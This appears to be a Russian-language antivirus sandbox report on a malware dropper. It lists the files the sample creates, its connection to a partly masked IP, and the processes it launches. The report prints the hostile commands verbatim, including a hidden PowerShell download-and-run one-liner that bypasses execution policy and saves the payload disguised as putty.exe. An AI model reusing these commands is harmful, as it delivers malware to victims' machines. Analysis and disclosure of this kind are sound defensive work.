Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://35.##8.83.21/lipocere.exe как %appdata%\putty.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\putty.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\drdtfhgygeghd{В .sct
- %APPDATA%\putty.exe
- %LOCALAPPDATA%\filenes\dumpinger123\handelsmonopolets110\markedskrfter\bobslde.dis
- %LOCALAPPDATA%\filenes\dumpinger123\handelsmonopolets110\markedskrfter\green_leaves_16.bmp
- %LOCALAPPDATA%\filenes\dumpinger123\rodendes\krlighedsforholdene\brylluppers.lit
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\sikkerhedsblterne.ini
- %TEMP%\nso43f3.tmp\system.dll
- %TEMP%\nse4efb.tmp\system.dll
- %TEMP%\nsj4e7e.tmp\system.dll
Удаляет следующие файлы
- %TEMP%\drdtfhgygeghd{В .sct
Сетевая активность
Подключается к
- '35.##8.83.21':80
TCP
Запросы HTTP GET
- http://35.##8.83.21/Lipocere.exe
Другое
Ищет следующие окна
- ClassName: '#32770' WindowName: ''
Создает и запускает на исполнение
- '%APPDATA%\putty.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\putty.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://35.##8.83.21/Lipocere.exe','%APPDATA%\putty.exe')' (со скрытым окном)
